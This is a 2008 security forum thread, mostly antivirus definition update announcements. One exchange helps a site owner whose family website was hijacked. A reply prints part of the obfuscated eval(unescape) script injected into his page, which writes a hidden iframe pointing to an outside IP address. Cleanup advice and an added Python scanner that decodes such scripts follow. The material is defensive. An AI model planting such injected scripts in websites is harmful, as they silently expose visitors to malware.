Spyware, Viruses, & Security forum

General discussion

UPDATES - July 4, 2008

TrojanHunter 5.0 Ruleset Update - July 3, 2008

An updated TrojanHunter ruleset is available. This update adds at least 34 new trojan definitions:

Adware.StickyPops.100
Adware.Vapsup.290
Agent.2555
Agent.2554
BHO.304
Hoax.Renos.367
Hupigon.1226
Monder.164
Monder.163
Monder.162
Monder.161
Mondera.104
Obfuscated.405
Obfuscated.404
PWSteal.LdPinch.714
PWSteal.OnLineGames.1120
Rootkit.Agent.350
Srizbi.116
Tibs.516
TrojanClicker.Small.243
TrojanDownloader.ConHook.192
TrojanDownloader.Delf.1390
TrojanDownloader.FraudLoad.229
TrojanDownloader.FraudLoad.228
TrojanDownloader.FraudLoad.227
TrojanDownloader.Tibs.263
TrojanDownloader.Wigon.105
TrojanDownloader.Zlob.1502
TrojanDownloader.Zlob.1501
TrojanDropper.Agent.918
TrojanProxy.Agent.430
TrojanSpy.FlyStudio.100
Vundo.1199
Worm.Pushbot.100

Licensed TrojanHunter users can easily update using TrojanHunter's LiveUpdate utility. If you are using the trial version of TrojanHunter, please see http://www.misec.net/trojanhunter/updating/ for instructions on how to update to the latest ruleset.

You should have 179065 rules.
http://www.misec.net/forum/board/RulesetUpdates/1215145549
BOClean FILE DATE : 2008-07-04 13:08:56 (UTC)

In reply to: UPDATES - July 4, 2008

TWENTY SIX new nasties for a total of 58013 **UNIQUE**
infectors (322,580 variants of these including
trojans, worms, bots, hijackers, downloaders, spam proxies, rootkits, adware,
spyware, keyloggers, "dialers" and other malware in total) covered in
today's update for BOClean 4.26.

Please also note that if you ever miss an update (or several) the update
you collect includes **ALL** previous update information. There is no
need to go hunting down other updates. The current one is always complete.
http://www.nsclean.com/trolist.html
BOClean FILEDATE: 2008-07-04 14:25:01 (UTC)

In reply to: BOClean FILE DATE : 2008-07-04 13:08:56 (UTC)

TWENTY new nasties for a total of 58033 *UNIQUE* infectors
(322,613 variants of these including trojans, worms, bots, hijackers,
downloaders, spam proxies, rootkits, adware, spyware, keyloggers,
"dialers" and other malware in total) covered in today's update for
BOClean 4.26.

Please also note that if you ever miss an update (or several) the update
you collect includes ***ALL*** previous update information. There is no
need to go hunting down other updates. The current one is always complete.
http://www.nsclean.com/trolist.html
NOD32 - 3241 (20080704)

In reply to: UPDATES - July 4, 2008

2008-07-04 11:41
INF/Autorun, Win32/Adware.Antivirus2008, Win32/Adware.Websearch, Win32/Agent.LNO, Win32/Agent.NXB (7), Win32/Agent.NXP (2), Win32/Autoit.DB, Win32/Autoit.DC (2), Win32/Autoit.DD (3), Win32/AutoRun.GQ (2), Win32/AutoRun.LU (3), Win32/AutoRun.RO (2), Win32/Bagle.PD, Win32/Mebroot.N (5), Win32/Pacex.Gen (2), Win32/PSW.OnLineGames.NMP, Win32/PSW.OnLineGames.NMY (2), Win32/PSW.OnLineGames.NNU (3), Win32/PSW.OnLineGames.NOP (3), Win32/PSW.OnLineGames.NXW, Win32/PSW.OnLineGames.NXX (2), Win32/PSW.OnLineGames.ODJ (2), Win32/Small.NDZ (3), Win32/Spy.Agent.NES, Win32/Spy.Banbra.NLM, Win32/TrojanClicker.VB.QF, Win32/TrojanDownloader.Banload.JFB, Win32/TrojanDownloader.Banload.KGG, Win32/TrojanDownloader.Banload.PFR (2), Win32/TrojanDownloader.VB.NPK (3), Win32/TrojanDownloader.Zlob.CCM (14), Win32/TrojanDropper.Agent.NJV, Win32/TrojanDropper.Delf.NHN, Win32/Zalup
http://www.eset.eu/podpora/aktualizacia-3241?lng=en
http://www.eset.eu/support/update-xy1
NOD32 - 3243 (20080704)

In reply to: NOD32 - 3241 (20080704)

2008-07-04 18:00
Win32/Agent.NIM (2), Win32/AutoRun.JX, Win32/AutoRun.RQ (4), Win32/Injector.BH, Win32/KeyLogger.Ardamax, Win32/KeyLogger.Ardamax.NAJ, Win32/PSW.Agent.NHG, Win32/PSW.Agent.NHV, Win32/PSW.Agent.NHW (2), Win32/PSW.Lineage.NGV, Win32/Spy.Agent.PZ, Win32/Spy.Banker.ORW, Win32/Spy.Banker.OWX, Win32/Spy.Delf.NHV, Win32/Spy.Delf.NJS (3), Win32/Spy.Pophot.BHB, Win32/TrojanDownloader.Small.ODI, Win32/TrojanDownloader.Zalup.D (2)
http://www.eset.eu/podpora/aktualizacia-3243?lng=en
http://www.eset.eu/support/update-xy1
Roddy, can you educate me re JS:Agent-AE

In reply to: NOD32 - 3241 (20080704)

Roddy, I have a family web site www.welcomefriends.org that has family photos. For years I have used it to share photos with family spread around the USA. Recently, when I click the link to enter the site from the opening page, I get an AVAST! warning that prevents the index.htm page from opening saying that the malware Trojan Horse JS:Agent-AE is present. That trojan is not on my hard drive since I scanned with AVAST!. So it is on the web site itself (ipower.com is my site host).

I did a Google search and got lots of hits in foreign languages and a few in English which led me to your posts.

As a newbie, what can you tell me about this Trojan and what can I do to remove it..or is it up to the host site to remove? Please send reply to my email xxx xxxxxxx as well as the CNET forum to be sure I see your answer.

Thanks Phil

Message was edited by: admin to remove email address to prevent spam harvesters from picking it up.

Hi Phil

In reply to: Roddy, can you educate me re JS:Agent-AE

This is the updates thread. You need to start your own new thread in the forum and someone, probably Marianna, will help you with this.

Another thing, you said you are a newbie and one of the first things to learn is to NEVER post your e-mail address in a public forum. We don't answer questions via e-mail anyway. They get answered in the same thread as your question so everyone will benefit.

Good luck to you.

Your Webpage has been hijacked.......

In reply to: Roddy, can you educate me re JS:Agent-AE

Right-clicking on your webpage and looking for the view source reveals at the end:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%38%30%34%39%34%32%36%38%61%37%37%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e

How can I tell if I've been hacked?

All your pages that a visitor would go to first to see your site (home page) will have the infected iframe, along with any login.php pages. This includes any index page in any subfolder and regardless of what the extension is. Be sure to check all index, default and home pages, and any login pages (just to be safe). You will see errors on your site you didn't see before. This is due to the hackers intentionally causing errors after uploading many scripts to have the information passed on to them. They also upload a file called xhide which is a process faker by schizoprenic Xnuxer Research 2002, and you will not be able to delete it (your host must), if you even find it...

The code may start like this:

<script language=javascript>document.write(unescape(%3C....."
Or, this:
<script>eval(unescape("%77 ...
And there will be lots of encoded numbers following.


What do I do if I'm hacked?

If you find any of the hacker's code, remove it in all your site's pages and subfolder pages, or restore a clean backup. This alone will not help you tho, as it's already been reported over and over again that the hackers simply re-add the iframe code after cleaning.... Once in your site, they are going to constantly be trying again! You need to clean your PC (reinstall if necessary) and change all your passwords. You especially need to change your hosting password and ftp passes, but change every password. If using the Article Dashboard script, or another script that is never updated for your protection, DELETE it completely from your hosting account so the hackers can't get back in.


Read more here:

http://www.spambusted.com/
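
The check described in the post above (look in every index, default, home and login page for an eval(unescape(...)) or document.write(unescape(...)) block) can be run over a local copy of the site. This is an added example, not part of the original post: it decodes the escapes as text without executing them and lists any iframe sources. The function names, the sample page and the host injected.example.invalid are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Entry pages the post says to check (any extension, any subfolder).
ENTRY_PAGE = re.compile(r"^(index|default|home|login)\.[^.]+$", re.I)
# The two openers quoted in the post, followed by a run of %XX escapes.
OBFUSCATED = re.compile(
    r"(?:eval|document\.write)\s*\(\s*unescape\s*\(\s*[\"']?((?:%[0-9a-f]{2}){8,})",
    re.I)
# src of an iframe inside the decoded text; quotes may be backslash-escaped.
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\\\"']*([^\s\\\"'>]+)", re.I)


def decode_findings(html):
    """Return [(decoded_text, [iframe src, ...])]; nothing is executed."""
    findings = []
    for match in OBFUSCATED.finditer(html):
        # JavaScript unescape() maps %XX to Latin-1 code points.
        decoded = unquote(match.group(1), encoding="latin-1")
        findings.append((decoded, IFRAME_SRC.findall(decoded)))
    return findings


def scan_site(root):
    """Map relative path -> findings for every entry page under root."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and ENTRY_PAGE.match(path.name):
            hits = decode_findings(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


def percent_encode(text):
    """Build %XX escapes for the constructed sample below."""
    return "".join("%%%02x" % b for b in text.encode("latin-1"))


# Constructed sample, not the payload from the page; the host is a placeholder.
SAMPLE_JS = ("window.status='Done';document.write('<iframe name=a1 "
             "src=\\'http://injected.example.invalid/x.php\\' width=1></iframe>')")
SAMPLE_PAGE = ("<html><body>Family photos</body>\n"
               "<script>eval(unescape(\"%s\"))</script></html>"
               % percent_encode(SAMPLE_JS))

if __name__ == "__main__":
    for decoded, sources in decode_findings(SAMPLE_PAGE):
        print("decoded:", decoded)
        print("iframe src:", sources)
```

Run scan_site() against a downloaded copy of the web root after each cleanup; a page that shows up again matches the post's warning that the iframe code is re-added until the passwords are changed.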

avast! 4.x VPS (released: 4.7.2008, version: 080704-1)

In reply to: UPDATES - July 4, 2008

BitDefender 16:08

In reply to: UPDATES - July 4, 2008

AntiVir Version: 7.00.05.52

In reply to: UPDATES - July 4, 2008

ClamAV #7638

In reply to: UPDATES - July 4, 2008

Latest ClamAV stable release is: 0.93.1
Total number of signatures: 342087
ClamAV Virus Databases:
main.cvd ver. 47 released on 23 Jun 2008 18:20 +0000
daily.cvd ver. 7638 released on 04 Jul 2008 11:41 +0000
http://www.clamav.net/

Panda

In reply to: UPDATES - July 4, 2008

McAfee Daily #5332

In reply to: UPDATES - July 4, 2008

AVG - AVI 270.4.5/ 1535

In reply to: UPDATES - July 4, 2008

NAV Daily

In reply to: UPDATES - July 4, 2008

Daily Updates
Symantec AntiVirus
Norton AntiVirus 2006/2007

Virus Definitions created July 4
Virus Definitions released July 4
Defs Version: 100704c
Sequence Number: 83199
Extended Version: 7/4/2008 rev. 3
Total Detections (Threats & Risks): 1883512
http://www.symantec.com/avcenter/defs.download.html
AVG Free 8.0.138

In reply to: UPDATES - July 4, 2008

Program update AVG Free 8.0.138
Fixed Bugs
Fixed problem with link scanning if <base> tag is presented on a web page.
http://free.avg.com/ww.94092
